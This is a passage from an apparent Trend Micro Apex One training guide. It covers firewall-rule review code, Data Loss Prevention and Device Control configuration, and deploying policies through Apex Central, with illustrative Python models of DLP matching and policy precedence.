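    rule_type_number: int   # first bracketed number, e.g. [2]
    rule_number: int        # second bracketed number, e.g. [10205]
    rule_type: str          # ACCESS
    direction: str          # IN, OUT or ANY
    l3: str                 # IPV4, IPV6 or ANY
    l4: str                 # TCP, UDP, ... or ANY
    src: str                # source address, "" = any, "!" prefix = not
    dst: str                # destination address or range, same convention
    sport: str              # source port, "" = any
    dport: str              # destination port, or "low:high" range (assumption)
    action: str             # ACCEPT or DROP
    description: str        # e.g. 2:0:TrustZone


def parse_rule(line: str) -> Optional[CfwRule]:
    """Return a CfwRule for an access-rule line, None for headers and blank lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    fields = [f.strip() for f in m.group(3).split(",")]
    if len(fields) < 9 or fields[0] != "ACCESS":
        return None
    fields += [""] * (10 - len(fields))   # a trailing empty description may be dropped
    return CfwRule(int(m.group(1)), int(m.group(2)), *fields[:10])


def parse_dump(text: str) -> List[CfwRule]:
    return [r for r in map(parse_rule, text.splitlines()) if r is not None]


def addr_ok(field: str, ip: str) -> bool:
    """Empty field matches any address; a leading "!" negates the comparison."""
    if not field:
        return True
    if field.startswith("!"):
        return ip != field[1:].strip()
    return ip == field


def port_ok(field: str, port: int) -> bool:
    """Empty field matches any port; "a:b" is treated as an inclusive range."""
    if not field:
        return True
    lo, _, hi = field.partition(":")
    return int(lo) <= port <= int(hi or lo)


def rule_matches(r: CfwRule, direction: str, l3: str, l4: str,
                 src_ip: str, dst_ip: str, sport: int, dport: int) -> bool:
    return (r.direction in ("ANY", direction) and r.l3 in ("ANY", l3)
            and r.l4 in ("ANY", l4) and addr_ok(r.src, src_ip)
            and addr_ok(r.dst, dst_ip) and port_ok(r.sport, sport)
            and port_ok(r.dport, dport))


def decide(rules: List[CfwRule], **packet) -> Optional[CfwRule]:
    """First rule in dump order that matches the packet. In the sample the last
    rule is the catch-all DROP anchor, so every packet gets a decision."""
    for r in rules:
        if rule_matches(r, **packet):
            return r
    return None


def unrestricted_accepts(rules: List[CfwRule]) -> List[CfwRule]:
    """Review aid: ACCEPT rules that constrain neither address nor port."""
    return [r for r in rules if r.action == "ACCEPT"
            and not (r.src or r.dst or r.sport or r.dport)]
```

Running `unrestricted_accepts` over a real dump is a quick way to spot ACCEPT rules with no address or port constraint when reviewing an Agent's effective policy.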



Lesson 13: Preventing Data Leaks on Endpoint Computers

Lesson Objectives:

After completing this lesson, participants will be able to:


• Install the Data Protection Plug-in
• Configure Data Protection templates and policies
• Configure Device Control

Apex One uses Data Loss Prevention to protect Agents from the risk of data loss or leakage. Data Loss
Prevention safeguards an organization’s sensitive data against accidental or deliberate leakage. Data
Loss Prevention allows you to:
• Identify the sensitive information that requires protection using data identifiers
• Create policies that limit or prevent the transmission of digital assets through common
transmission channels, such as email and external devices
• Enforce compliance to established privacy standards

Data Loss Prevention in Apex One provides the following features:


• Digital Asset Control
• Device Control

Data Loss Prevention


The Security Agent is responsible for the monitoring and detection of digital assets at the endpoint. The
Data Loss Prevention Agent communicates with the Apex One Server and acquires the definition of
digital assets, compliance templates, company policies, data discovery tasks and other system
configurations. Using these definitions, the Agent can monitor and protect digital assets on the endpoint.
If sensitive information is detected, it then performs the actions specified in the policies and notifies the
server about the violation.

The Security Agent performs the following tasks:


• Downloads company policies using ActiveUpdate
• Scans transferred data and takes action on this data depending on company policies
• Reports security violations to the server

It keeps a connection with the server and performs the monitoring and protection of digital assets based
on policies received from the Apex One Server.

The main Data Loss Prevention Agent configuration file called dsa.pro is stored in the following folder:
…\Security Agent\dlplite\System32\


This configuration file contains the deployment-specific configuration settings for the Agent. The server
transfers the following data and configuration settings to the Data Loss Prevention Agent:
• A portion of the system configuration settings that affect the Agent, such as scanning limits, is
stored in the dsa.cfg file in the following folder:
…\Security Agent\dlplite\System32\dgAgent
• Company Policies and other digital asset configurations are stored in the dsa.pol file in the
following folder:
…\Security Agent\dlplite\System32\dgAgent

Installing Data Protection


Data Loss Prevention and Device Control are native Apex One features but are licensed separately.
After you install the Apex One Server, these features are available but are not yet functional and
cannot be deployed to Agents until the plug-in has been incorporated into the Apex One Server. You
can then activate the Data Protection license to enable the features.

In an on-premise deployment, Apex One Data Protection is installed and activated from the Plug-in
Manager and is deployed to Agents as soon as the Data Loss Prevention settings are enabled.
1 In the Apex One Web Management console, click the Plug-ins menu. In the Apex One Data
Protection section, click Download.

2 Confirm the download of Apex One Data Protection and click OK to proceed.


3 After the download is complete, click Install Now.

4 When prompted, click Agree to accept the license agreement.

5 Once installed, click Manage Program.


6 Type the Data Protection Activation Code and click Save.

7 A new menu item for Data Loss Prevention becomes available in the Web Management console.


Digital Asset Control


Digital assets are data and files that an organization must protect against unauthorized transmission.
Examples of digital assets are:
• Confidential documents
• Customers' private information

Data Identifiers
Administrators define digital assets through:
• Expressions
• File Attributes
• Keyword Lists

Expressions

Expressions define data that has a certain structure, for example credit card numbers, which
typically have 16 digits and appear in the format nnnn-nnnn-nnnn-nnnn. Other expressions
may be SWIFT or IBAN numbers, social security numbers (by country), email addresses, postal
codes, etc. Administrators can use predefined and customized expressions.

Data Loss Prevention comes with a set of predefined expressions. These expressions cannot be
modified or deleted. Data Loss Prevention verifies these expressions using pattern matching and
mathematical equations. After Data Loss Prevention matches potentially sensitive data with an
expression, the data may also undergo additional verification checks.


File Attributes

File attributes are file properties such as file type and file size. By themselves, file attributes are
poor identifiers of sensitive files, but combining file attributes with other Data Loss Prevention
identifiers can result in a more targeted detection of sensitive files.

Data Loss Prevention comes with a predefined file attributes list. This list cannot be modified or
deleted. The list has its own built-in conditions that determine if the template should trigger a
policy violation.

Keyword Lists

Keyword lists include special words or phrases. You can add related keywords to a keyword list
to identify specific types of data. For example, prognosis, blood type, vaccination, and physician
are keywords that may appear in a medical certificate. If you want to prevent the transmission of
medical certificate files, you can use these keywords in a Data Loss Prevention policy and then
configure Data Loss Prevention to block files containing these keywords. Each keyword list
contains a condition that requires a certain number of keywords to be present in a document
before the list triggers a violation. The number of keywords condition has the following
values:
• All: All of the keywords in the list must be present in the document.
• Any: Any one of the keywords in the list must be present in the document.
• Specific number: There must be at least the specified number of keywords in the document.
If there are more keywords in the document than the number specified, Data Loss
Prevention triggers a violation.


Some of the lists contain a distance condition to determine if a violation is present. Distance
refers to the number of characters between the first character of one keyword and the first
character of another keyword.

Data Loss Prevention comes with a set of predefined keyword lists. These keyword lists cannot
be modified or deleted. Each list has its own built-in conditions that determine if the template
should trigger a policy violation.

Data Loss Prevention Templates


A Data Loss Prevention policy contains one or more templates. A Data Loss Prevention template
combines data identifiers and logical operators (And, Or, Except) to form condition statements. Only
files or data that satisfy a certain condition statement will be subject to a Data Loss Prevention
policy.

For example, a file must be a Microsoft Word file (file attribute) AND must contain certain legal terms
(keywords) AND must contain ID numbers (expressions) for it to be subject to the Employment
Contracts policy. This policy allows Human Resources personnel to transmit the file through printing
so that the printed copy can be signed by an employee. Transmission through all other possible
channels, such as email, is blocked. If a file or data matches the definition on more than one
template, the higher priority template applies.


Data Loss Prevention comes with the following set of predefined templates that you can use to
comply with various regulatory standards, for example:
• GLBA: Gramm-Leach-Bliley Act
• HIPAA: Health Insurance Portability and Accountability Act
• PCI-DSS: Payment Card Industry Data Security Standard
• SB-1386: US Senate Bill 1386
• US PII: United States Personally Identifiable Information

Note: These templates cannot be modified or deleted.

You can also create your own templates if you have configured data identifiers. A template combines
data identifiers and logical operators (And, Or, Except) to form condition statements.
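The data identifiers and template logic described above, as an added example in Python (not Trend Micro's engine): an expression with a verification step, a keyword list with a number-of-keywords and distance condition, a file attribute, and a template joining them with And/Or/Except. The Luhn checksum is assumed as the verification check for card numbers, and all identifiers and documents below are constructed.

```python
"""Toy evaluation of Data Loss Prevention data identifiers and a template.
Added example, not Trend Micro's engine. It models the identifier kinds
described above (expression, file attribute, keyword list) and a template
that joins them with And/Or/Except. The Luhn checksum stands in for the
"additional verification check" mentioned for card numbers; the page does not
say which checks Apex One applies. All sample data below is constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


def luhn_ok(digits: str) -> bool:
    """Mod-10 checksum used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch) * (2 if i % 2 else 1)
        total += d - 9 if d > 9 else d
    return total % 10 == 0


@dataclass
class Expression:           # structured data: pattern plus optional verification
    name: str
    pattern: str
    verify: Optional[Callable[[str], bool]] = None

    def matches(self, doc: dict) -> bool:
        for m in re.finditer(self.pattern, doc["text"]):
            if self.verify is None or self.verify(re.sub(r"\D", "", m.group(0))):
                return True
        return False


@dataclass
class KeywordList:          # condition: "all", "any" or "specific" (>= number)
    name: str
    keywords: List[str]
    condition: str = "any"
    number: int = 1
    distance: Optional[int] = None   # max chars between first chars of two hits

    def matches(self, doc: dict) -> bool:
        low = doc["text"].lower()
        hits = sorted(p for p in (low.find(k.lower()) for k in self.keywords) if p >= 0)
        if self.condition == "all":
            ok = len(hits) == len(self.keywords)
        elif self.condition == "any":
            ok = len(hits) >= 1
        else:
            ok = len(hits) >= self.number
        if ok and self.distance is not None:
            # Assumption: satisfied when two hits start within `distance` characters.
            ok = any(b - a <= self.distance for a, b in zip(hits, hits[1:]))
        return ok


@dataclass
class FileAttribute:        # file properties: extension and maximum size in bytes
    name: str
    extensions: List[str]
    max_size: Optional[int] = None

    def matches(self, doc: dict) -> bool:
        ext_ok = any(doc["filename"].lower().endswith(e) for e in self.extensions)
        return ext_ok and (self.max_size is None or doc["size"] <= self.max_size)


@dataclass
class Template:             # clauses are (operator, identifier); first operator ignored
    name: str
    clauses: List[Tuple[str, object]]

    def matches(self, doc: dict) -> bool:
        result = None
        for op, ident in self.clauses:
            hit = ident.matches(doc)
            if result is None:
                result = hit
            elif op == "And":
                result = result and hit
            elif op == "Or":
                result = result or hit
            elif op == "Except":
                result = result and not hit
        return bool(result)


# Constructed identifiers mirroring the Employment Contracts example above.
# A document is a dict with "filename", "size" (bytes) and "text" keys.
CARD_NUMBER = Expression("Credit card", r"\b\d{4}-\d{4}-\d{4}-\d{4}\b", luhn_ok)
ID_NUMBER = Expression("ID number", r"\b\d{3}-\d{2}-\d{4}\b")
WORD_FILE = FileAttribute("Microsoft Word", [".doc", ".docx"])
LEGAL_TERMS = KeywordList("Legal terms", ["employment agreement", "compensation",
                          "termination"], condition="specific", number=2, distance=200)
EMPLOYMENT_CONTRACTS = Template("Employment Contracts", [
    ("", WORD_FILE), ("And", LEGAL_TERMS), ("And", ID_NUMBER)])
```

A pattern match alone is not enough for `CARD_NUMBER`: a 16-digit string that fails the checksum is treated as a false positive and does not trigger the expression.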

Data Loss Prevention Policies


Administrators can limit or prevent transmission of digital assets by creating policies. Apex One
evaluates a file or data against the rules defined in the Data Loss Prevention policies. The policies
determine which files or data require protection from unauthorized transmission and the action that
Apex One performs after detecting a transmission.

Administrators can configure policies for internal and external Security Agents. Typically, a stricter
policy is configured for external Agents. The policies can be enforced for specific Agent groups or
individual Agents.


Policies are created by configuring and selecting the following:


• Template: Combines data expressions, keywords and file attributes (as described earlier).
• Channel: Channels are methods that transmit sensitive information. Data Loss Prevention
supports popular transmission channels, such as email, FTP, HTTP/S, IM applications, SMB
protocol, and webmail.
• Action: Data Loss Prevention performs one or several actions when it detects an attempt to
transmit sensitive information through any of the channels. Different actions can be
selected when there is a match, like blocking the file, or logging the event. Additional
settings can be configured like displaying a notification message to the user or recording the
data (makes a copy of the file for forensic/auditing purposes).

Note: Recording sensitive data may consume large amounts of hard disk space. It is highly
recommended that you only choose this option for highly sensitive information.

• Exception: Exceptions act as overrides to the configured Data Loss Prevention rules.

Data Loss Prevention Policies can be created by selecting the domain, group or Agents receiving the
policy in the Agent Management list and clicking Settings > DLP Settings from the right-mouse
button menu. Click the policies link to begin the policy configuration.

Configuration steps include:


1 Enabling Data Loss Prevention and adding a new rule.


2 Selecting the template to apply to the policy.


3 Selecting the channel that will be monitored by the policy.

4 Selecting the action that will be triggered by the policy.


When User Justification is enabled, the end user will be able to transfer the file even though the
action is set to Block, but they must select one of the listed reasons for the transfer before it
completes the operation.

The list of justification reasons can be changed by editing the ofcscan.ini file on the Apex
One Server and modifying the entries listed for DlpUserJustificationItem.

Detecting Digital Assets


The Data Loss Prevention Agent creates a Boolean expression based on the raw policy contents. The
Policy Engine also re-organizes the condition rules (defined using compliance templates) and creates
a separate Boolean expression tree for the condition. The data being analyzed is compared against
this expression using the different match engines. This means that a policy only matches if its target,
channel and condition are all satisfied. Otherwise, no action is enforced on the data.


Data Loss Prevention Logging


When a violation is detected, the Real-Time Scan Service parses and writes to the violation log.

Forensic Folder and DLP Database


After a Data Loss Prevention incident occurs, Apex One logs the incident details in a specialized
forensic database. Apex One also creates an encrypted file containing a copy of the sensitive data
which triggered the incident and generates a hash value for verification purposes and to ensure the
integrity of the sensitive data. Apex One creates the encrypted forensic files on the Agent machine
and then uploads the files to a specified location on the server.

Since the encrypted forensic files contain highly sensitive data, administrators should exercise
caution when granting access to these files.

Apex One integrates with Apex Central to provide Apex Central users with the DLP Incident
Reviewer or DLP Compliance Officer roles the ability to access the data within the encrypted files.
Administrators can change the location and deletion schedule of the forensic folder, and the
maximum size of files that Agents upload by modifying Apex One’s *.ini files.

Note: Changing the location of the forensic folder after logging Data Loss Prevention incidents can
cause a disconnect between the database data and the location of existing forensic files. Trend
Micro recommends manually migrating any existing forensic files to the new forensic folder
after modifying the forensic folder location.

Device Control
Device Control functionality as part of Data Loss Prevention provides a way to:
• Limit the access of an endpoint or a group of endpoints to specific devices
• Define an exception list (Approved Devices) for USB devices via USB granular support


Settings for this feature are stored on the Apex One Server in the ofcscan.ini and the database.
Settings for this feature are stored on the Agent in the following:
…\Security Agent\dlplite\dc.xml, dc_in.xml, and dc_out.xml

Devices that are supported are shown below.

• CD/DVD: Apex One monitors data recorded to physical and virtual CD/DVD devices (for example,
Daemon Tools, PowerISO)
• Ports: COM and LPT, including all devices under the Ports category in Device Manager
• Floppy disk controllers: Virtual Machine Floppy Driver; disk controllers (generally, for drives A/B)
• Removable disk drives: Removable disks such as USB drives, flash drives, storage cards, hubs etc.
NOTE: This option has an exception list discussed below.
• IEEE 1394 Bus host controllers: IEEE 1394 interface on devices. TIP: Also referred to as
FireWire, it is a high-speed serial input/output bus for computer peripherals and consumer
electronics, capable of transfer speeds of up to 400 megabits per second
• Imaging devices: Cameras, scanners
• Infrared devices: Devices that can send and receive infrared data, such as infrared transceivers
and adapters
• Modems: Network interface
• PCMCIA adapters: Peripheral interface for laptops. TIP: PCMCIA stands for Personal Computer
Memory Card International Association
• Print Screen key: PrtSc or Print Screen key on keyboard
• Wireless NICs: Wireless network cards of Trend Micro tested mobile devices
• Bluetooth: Bluetooth adapters

Note: Apex One includes a native Device Control feature that regulates access to commonly used
devices such as USB storage devices. Device Control included as part of the Data Protection
module expands the range of monitored devices.


To configure Device Control Setting, select a domain, group or device under Agent Management and
click Settings > Device Control Settings:

Permissions for Mobile Devices and Non-Storage Devices include:

• Allow
  Files on the device: Permitted operations: Copy, Move, Open, Save, Delete, Execute
  Incoming files: Permitted operations: Save, Move, Copy. Files can be saved, moved, and copied
  to the device.
• Block (available after installing Data Protection)
  Files on the device: Prohibited operations: All operations. The device and the files it contains
  are not visible to the user (for example, from Windows Explorer).
  Incoming files: Prohibited operations: Save, Move, Copy


Permissions for Storage Devices include:

• Full access
  Files on the device: Permitted operations: Copy, Move, Open, Save, Delete, Execute
  Incoming files: Permitted operations: Save, Move, Copy. Files can be saved, moved, and copied
  to the device.
• Modify
  Files on the device: Permitted operations: Copy, Move, Open, Save, Delete. Prohibited
  operations: Execute
  Incoming files: Permitted operations: Save, Move, Copy
• Read and execute
  Files on the device: Permitted operations: Copy, Open, Execute. Prohibited operations: Save,
  Move, Delete
  Incoming files: Prohibited operations: Save, Move, Copy
• Read
  Files on the device: Permitted operations: Copy, Open. Prohibited operations: Save, Move,
  Delete, Execute
  Incoming files: Prohibited operations: Save, Move, Copy
• List device content only
  Files on the device: Prohibited operations: All operations. The device and the files it contains
  are visible to the user (for example, from Windows Explorer).
  Incoming files: Prohibited operations: Save, Move, Copy
• Block (available after installing Data Protection)
  Files on the device: Prohibited operations: All operations. The device and the files it contains
  are not visible to the user (for example, from Windows Explorer).
  Incoming files: Prohibited operations: Save, Move, Copy

Note: File-based scanning complements, and may override, the device permissions. For example, if the
permission allows a file to be opened but the Security Agent detects that the file is infected with
malware, a specific scan action is performed on the file to eliminate the malware. If the scan
action is Clean, the file opens after it is cleaned. However, if the scan action is Delete, the file is
deleted.

USB Exception List


Removable disk drives support exemptions. To define USB disk drives, the Administrator must
provide the following:
• Vendor: Disk drive's vendor name
• Model: Four-bit product number
• Serial Number: Another device descriptor in HEX format

Getting these details is not always a straight-forward process. Some manufacturers even have their
own way of displaying this information. To address this issue, Device Control provides an Auto-
Detect Assistance tool (listDeviceInfo.exe).


This tool searches the local system for all connected USB disks and lists the vendor, model and serial
number of each device as shown in the example below. The Administrator can then refer to this
output to determine the information that needs to be provided in the exception list. A maximum of
200 USB disks can be exempted.

Once the details of the USB drive are known, set the permissions for the USB device to Block and
click Approved Devices. Complete the Approved Devices list with the details retrieved from
listDeviceInfo.exe.

Note: By default, Device Access Control violations are collected for a period of 1 hour, then uploaded
to the Apex One server. In environments with many Agents under strict controls, this could
generate a large increase in the amount of logs sent to the server.
On the Agent this value appears in the Registry under:
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TrendMicro\PC-cillinNTCorp\CurrentVersion\AEGIS\SendLogPeriod



Lesson 14: Deploying Policies Through Trend Micro Apex Central

Lesson Objectives:

After completing this lesson, participants will be able to:


• Register Apex Central in Apex One
• Configure Apex One policies in Apex Central for deployment to endpoints

Apex Central
Apex Central (previously known as Control Manager) provides a centralized console to manage, monitor,
and report across multiple layers of security in all your Trend Micro product deployments.

Customizable data displays provide the visibility and situational awareness for administrators to rapidly
assess status, identify threats, and respond to incidents. Administration can be streamlined to achieve
more consistent policy enforcement with single-click deployment of data protection policies across
endpoint, messaging, and gateway solutions.

User-based visibility shows what is happening across all endpoints owned by users, enabling
administrators to review policy status and make changes across all user devices.

In the event of a threat outbreak, administrators have a central access point for complete visibility of an
environment to track how threats have spread.

With a better understanding of security events, it becomes easier to prevent them from reoccurring.
Direct links to the Trend Micro Threat Connect database provide access to actionable threat intelligence,
which allows administrators to explore the complex relationships between malware instances, creators,
and deployment methods. Apex Central is then able to apply policy on how these suspicious objects
should be treated.

Apex One sends and can retrieve suspicious objects from Apex Central. Additionally, Apex One can
leverage Scan Actions (for example Log or Block) from Apex Central.


The Dashboard in the Apex Central console provides the status summary for the entire Apex Central
network.

Apex Central Services


The following services are installed as part of Apex Central.

Component                                Description
Trend Micro Apex Central Service         This component launches and stops other Apex Central core
(ProcessManager.exe)                     processes.
Trend Micro Management Infrastructure    Provides the Apex Central Web Management console and manages
(cm.exe)                                 the Product Directory. Also manages the Message Routing
                                         Framework (the Communicator) which serves as the communications
                                         backbone for Apex Central. This component of the Trend Micro
                                         Infrastructure handles all communication between the Apex
                                         Central Server and managed products for all older Control
                                         Manager agents. They interact with older Control Manager agents
                                         to communicate with managed products.


Apex Central Management Modes


Apex Central can be deployed in a few different management modes, including a pure on-premise, cloud
or hybrid deployment.

On-premise Management Mode


In on-premise management mode, an Apex Central Server is deployed to provide management and
policy deployment capabilities to Apex One and Apex One (Mac) Servers. In this type of deployment,
the Apex Central and Apex One Servers are installed on premise.

[Figure: on-premise management mode. Apex Central manages the Apex One/Apex One (Mac) Servers, which in turn manage the Security Agents.]

Cloud Management Mode


In cloud management mode, an instance of Apex Central as a Service is deployed to provide
management and policy deployment capabilities to instances of Apex One and Apex One (Mac) as a
Service.

[Figure: cloud management mode. Apex Central as a Service manages Apex One/Apex One (Mac) as a Service, which in turn manages the Security Agents.]


Hybrid Mode
This management mode uses a combination of on-premise and cloud “as a service” servers. In the
example displayed here, multiple instances of Apex One as a Service as well as an on-premise
deployment of Apex One are registered to an on-premise Apex Central Server. This on-premise Apex
Central can manage other Trend Micro products, like Deep Discovery Analyzer, Deep Security, Trend
Micro ScanMail for Microsoft Exchange and others.

This type of installation requires the Remote Connection Tool in the DMZ to allow the SaaS product
consoles to register to the on-premise Apex Central Server. The Remote Connection Tool will run as
a service named SmartRelay (Smart Relay Service).

[Figure: hybrid mode. An on-premise Apex Central Server, reached through the Remote Connection Tool in the DMZ, manages an on-premise Apex One/Apex One (Mac) Server, Deep Discovery Analyzer and other Trend Micro products, plus Apex One/Apex One (Mac) as a Service instances in the Central US and Western Europe regions. Each Apex One instance, on premise or cloud, manages its own Security Agents.]

The Remote Connection Tool can be downloaded, along with details on its use, from the Trend Micro
Customer Success Web site at:
https://success.trendmicro.com/solution/1118614-setting-up-apex-one-as-a-service-remote-connection-to-control-manager-tmcm.


Managing Apex One Policies in Apex Central


Policies are used to enforce product settings on managed products. In Apex Central, policies for
endpoints can be managed centrally from the Apex Central Web Management console. Administrators
can set policies on endpoints identified using different criteria within Apex Central.

Policy Management is a powerful feature in Apex Central as it allows administrators to enforce settings
on specific products and specific targets from a single console. Administrators can assign a policy to a
large number of endpoints which sit across different servers and even across different domains.

Administrators can group endpoints from the Apex Central Web Management console instead of using
the traditional Apex One server-domain structure product tree to manage endpoints. They can also
easily check all deployment results from the Policy list, Policy Status widget and Data Leak Prevention
violation widget, and they can troubleshoot according to the policy status of each endpoint returned by
the product.

To manage Apex One policies through Apex Central in an on-premise installation, an administrative user
would complete the following steps:
1 Connect Apex Central and Apex One.
2 Create a user account for the Apex Central administrator in Apex One.
3 Add Apex One to the Apex Central Product Directory.
4 Select the Apex One Security Agent as the product on which you will configure policy settings.
5 Select the endpoints on which to assign and deploy the policy.
6 Create a policy template by identifying the policy settings required.
7 Deploy the policy.

When a policy is created, administrators are able to specify the policy targets and the settings to be
applied. However, as the policy can only cover endpoints where the Apex Central administrative user has
access, it is important to plan who will create the policy. It is also possible for multiple administrators to
have the same policy settings but different targets because they only have access to specific endpoints
and entities.

Connecting Apex One and Apex Central


Communication between Apex One and Apex Central is configured through the Apex One Web
Management console.
1 On the Apex Central server, locate the digital certificate created during the setup of the server.
The certificate file is called TMCM_CA_Cert.pem and is located in the following folder on the
Apex Central Server:
C:\Program Files (x86)\Trend Micro\Control Manager\Certificate\CA\
Copy this file to a location accessible by Apex One.
2 Log into the Apex One Web Management console and click Administration > Settings > Apex
Central.
3 In the Apex Central Settings window, the Connection Status should be displayed as Not
connected.


Complete the details of the Apex Central Server as follows:

• Entity display name: Type a name for the Apex One Server. This is the name used to display
the Apex One Server in Apex Central.
• Server FQDN or IP address: Type the server fully qualified domain name or IP address.
• Port: Accept the default port of 443.
• Apex Central Certificate: Click Browse and locate the TMCM_CA_Cert.pem certificate file
copied over from the Apex Central Server.
4 Click Test connection. A message indicating that the connection was successful should be displayed. Click OK.

5 Click Register. The connection status is updated.


Creating an Apex Central User Account


The Apex Central administrator must have an account in Apex One with the appropriate
administrative permissions. This account will enable single sign-on into Apex One from Apex Central.
1 Log into the Apex One Web Management console and click Administration > Account
Management > User Accounts.
2 Click Add to create a new account. Complete the details for the account as follows:

• Select Role: Select Administrator (Built-in) from the list
• User name: Type the name of the Apex Central administrator as identified during the Apex
Central setup
• Password: Type the password for the Apex Central administrator as identified during the
Apex Central setup
Click Next.


3 Select the Agent Tree Scope to define the branches of the Agent Tree this administrator will
have control over. The top branch of the Apex One Server is selected by default. Click Next.

4 To enable the Apex One items that the Apex Central account will have permissions to control,
click the Apex One Server at the top of the list and click Finish.


5 The new user account is displayed.

Adding Apex One to the Apex Central Product Directory


New products added to Apex Central are assigned to a folder in the Product Directory called New
Entity by default. The product must be reassigned to another folder to enable management through
Apex Central and assign the appropriate management permissions.
1 In the Apex Central Web Management console, click Directories > Products and click Directory
Management.


2 Click Local Folder, and click Add Folder.

3 Type a name for a new folder (or directory), for example, Trend Micro Servers and click
Save. Click OK to confirm the creation of the directory.

4 Expand the New Entity folder. Drag the Apex One Server device from New Entity folder to the
newly created folder.

When prompted, click OK to acknowledge the move.


The Apex One Server should be displayed in the Trend Micro Servers folder.

Selecting the Destination Product


Apex Central can deploy policy settings to a variety of Trend Micro products. The Apex One Security
Agent can be selected as the destination product to receive policy attributes for protecting endpoint
computers.

In the Apex Central Web Management console, click Policies > Policy Management. In the Product list,
select Apex One Security Agent. To create a policy for this product, click Create or Create one now.


Identifying Policy Targets


Administrators can manually select the target endpoints or use a filter to automatically assign
targets to their policies. The target selection can use dynamic filtering or static binding, and targets
can be selected by IP subnet, operating system, naming rules in the Apex Central product tree or Active
Directory organizational units.

None (Draft only)


This option provides a way to save a policy definition without applying it to any targets. This
allows an administrative user to fine tune settings and then switch over to either a Specified
or Filtered policy that can be put into actual use. Drafts have the lowest priority and always
stay at the bottom of the Policy List.

Filter by Criteria

Filter by Criteria is useful for deploying standard settings to a group of targets across the
organization. The filter uses known characteristics of the devices, including operating system,
location, IP address or other metrics. If the specified criteria match, Apex Central applies the
corresponding policy. If the matching characteristics change over time, then a different policy
gets deployed.


Specify Target(s)
This option is useful for deploying settings only to specific target devices. This method uses
a static assignment, meaning once a policy is assigned to the selected targets, the assigned
policy will never change or be re-evaluated. This policy also has the highest priority and will
always apply. For a server in an environment where the security policy MUST be the same
policy and never change, use Specify Target(s) to deploy a policy that is locked to the
specified device(s).

In the list of endpoints, click to select the appropriate endpoints and click Add Selected
Targets. Click OK.
When defining policy targets, certain limitations must be kept in mind:
• Administrative users cannot apply a policy to a target which is listed under the New
Entity folder in the Product Directory. Administrative users cannot browse or search for
a target under this folder.
The target must be moved from the New Entity folder to another folder before creating
the policy.
• Apex Central policy assignments are not incremental; all settings deployed by the policy
will overwrite any existing settings that are currently configured on the endpoint.
• A specified policy takes precedence over a filtered policy. In the case where a server or
endpoint matches multiple specified policies, the latest policy gets applied to the target.
However, if a server or endpoint matches multiple filtered policies, it takes the first
policy that it matched based on the order of priority. The priority order can be
rearranged to meet the administrative requirement. Only one policy is applied to a
server or endpoint.
For example, if Web Reputation must always be disabled for all developer workstations
that are located on an isolated and secure subnet within an environment, administrative
users can deploy a policy using Specify Targets (hard coded policy) that has Web
Reputation turned OFF. Then, Filter by Criteria could be used to assign an additional
policy with Web Reputation enabled to only Windows platform users.
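The precedence rules above, worked through as an added Python example (not Trend Micro code): a resolver that picks the single policy an endpoint receives from constructed Specified, Filtered and Draft policies. The Endpoint and Policy structures, the sample policy names and the subnet criterion are assumptions made for illustration.

```python
"""Resolve which Apex Central policy an endpoint receives (added example)."""
from dataclasses import dataclass, field
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import Callable, List, Optional, Set


@dataclass
class Endpoint:
    name: str
    ip: str
    os: str
    folder: str  # Product Directory folder of the endpoint's server (assumed attribute)


@dataclass
class Policy:
    name: str
    kind: str                      # "draft", "specified" or "filtered"
    settings: dict
    created: datetime              # decides between several matching Specified policies
    targets: Set[str] = field(default_factory=set)          # Specified policies only
    criteria: Optional[Callable[[Endpoint], bool]] = None   # Filtered policies only
    priority: int = 0              # position in the Policy List (1 = top)


def resolve_policy(endpoint: Endpoint, policies: List[Policy]) -> Optional[Policy]:
    """Return the one policy Apex Central would apply, or None.

    Rules modelled from the text: targets still under New Entity cannot be
    assigned; a Specified policy always beats a Filtered one; among several
    matching Specified policies the latest created wins; Filtered policies
    are tried in Policy List order and the first match wins; Drafts never
    apply; only one policy is ever returned.
    """
    if endpoint.folder == "New Entity":
        return None

    specified = [p for p in policies
                 if p.kind == "specified" and endpoint.name in p.targets]
    if specified:
        return max(specified, key=lambda p: p.created)

    for p in sorted((p for p in policies if p.kind == "filtered"),
                    key=lambda p: p.priority):
        if p.criteria is not None and p.criteria(endpoint):
            return p
    return None


def in_subnet(cidr: str) -> Callable[[Endpoint], bool]:
    """Filter-by-criteria helper: the endpoint IP falls inside ``cidr``."""
    net = ip_network(cidr)
    return lambda ep: ip_address(ep.ip) in net


def effective_settings(endpoint: Endpoint, policies: List[Policy]) -> dict:
    """Settings the endpoint ends up with (empty if no policy applies)."""
    policy = resolve_policy(endpoint, policies)
    return dict(policy.settings) if policy else {}


# Constructed sample policies mirroring the Web Reputation example in the text.
DEV_LOCKED = Policy("Developer workstations (WRS off)", "specified",
                    {"web_reputation": False}, datetime(2019, 5, 1),
                    targets={"dev01", "dev02"})
DEV_OVERRIDE = Policy("Developer override (WRS on)", "specified",
                      {"web_reputation": True}, datetime(2019, 5, 15),
                      targets={"dev02"})   # later Specified policy wins for dev02
ISOLATED_NET = Policy("Isolated subnet (WRS off)", "filtered",
                      {"web_reputation": False}, datetime(2019, 3, 1),
                      criteria=in_subnet("10.9.0.0/24"), priority=1)
WINDOWS_WRS = Policy("Windows users (WRS on)", "filtered",
                     {"web_reputation": True}, datetime(2019, 4, 1),
                     criteria=lambda ep: ep.os.startswith("Windows"), priority=2)
DRAFT = Policy("Baseline draft", "draft", {"web_reputation": True},
               datetime(2019, 6, 1))
POLICIES = [DRAFT, WINDOWS_WRS, DEV_LOCKED, ISOLATED_NET, DEV_OVERRIDE]

if __name__ == "__main__":
    for ep in (Endpoint("dev01", "10.9.0.5", "Windows 10", "Trend Micro Servers"),
               Endpoint("dev02", "10.9.0.6", "Windows 10", "Trend Micro Servers"),
               Endpoint("lab07", "10.9.0.22", "Windows 10", "Trend Micro Servers"),
               Endpoint("hr01", "192.168.1.10", "Windows 10", "Trend Micro Servers"),
               Endpoint("build1", "192.168.1.11", "Linux", "Trend Micro Servers")):
        chosen = resolve_policy(ep, POLICIES)
        print(ep.name, "->", chosen.name if chosen else "no policy")
```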


Defining Policy Settings


Once Apex Central deploys a policy to the target endpoints, the settings defined in the policy will
overwrite any settings configured for these targets by the Apex One Server. Apex Central re-enforces
the policy settings on the targets every 24 hours.

